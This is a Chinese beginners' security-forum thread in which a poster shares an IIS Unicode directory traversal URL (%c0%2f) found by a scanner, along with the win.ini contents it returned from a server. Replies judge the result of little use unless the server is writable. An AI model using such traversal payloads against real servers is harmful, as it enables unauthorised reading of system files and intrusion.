论坛: 菜鸟乐园 标题: 郁闷,请高手们指教,多谢!!!!!!! 复制本贴地址    
作者: fu414 [fu414]    论坛用户   登录
我菜菜菜,用扫描器扫到这样的漏洞,还请高手指教,谢谢
/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini
打开页面是这样的:
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMC=1 CMCDLLNAME=mapi.dll CMCDLLNAME32=mapi32.dll MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] asf=MPEGVideo asx=MPEGVideo ivf=MPEGVideo m3u=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpv2=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wvx=MPEGVideo [OLFax Ports] OLFModem=C:\Program Files\Microsoft Office\Office\2052\WFXMSRVR.EXE,WFXMSRVR,WFXOUTLOOKSMTPPOP3, 60 [OLFax] Cover Path=C:\PROGRA~1\MICROS~3\Office\cover\2052\ Fax Path=C:\PROGRA~1\MICROS~3\Office\data\ ExePath=C:\PROGRA~1\MICROS~3\Office\2052\ [WinZip] Note-1=This section is required only to install the optional WinZip Internet Browser Support build 0231. Note-2=Removing this section of the win.ini will have no effect except preventing installation of WinZip Internet Browser Support build 0231. win32_version=6.3-8.0 

地主 发表时间: 06/18 02:25
回复: shavb [shavb]   论坛用户   登录
在IE里输这些

B1层 发表时间: 06/18 04:12
回复: laievf [laievf]   论坛用户   登录
用unicode漏洞吗?大概是win.ini的内容,除了一些路径之类的其它的都没什么用

B2层 发表时间: 06/18 06:30
回复: hanfei117 [hanfei117]   论坛用户   登录
我看了一下。
好象基本上没有什么的用处呀?
努力吧?

B3层 发表时间: 06/18 08:48
回复: tmxk [tmxk]   论坛用户   登录
如果可写的话是有用处的。

B4层 发表时间: 06/18 08:55

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号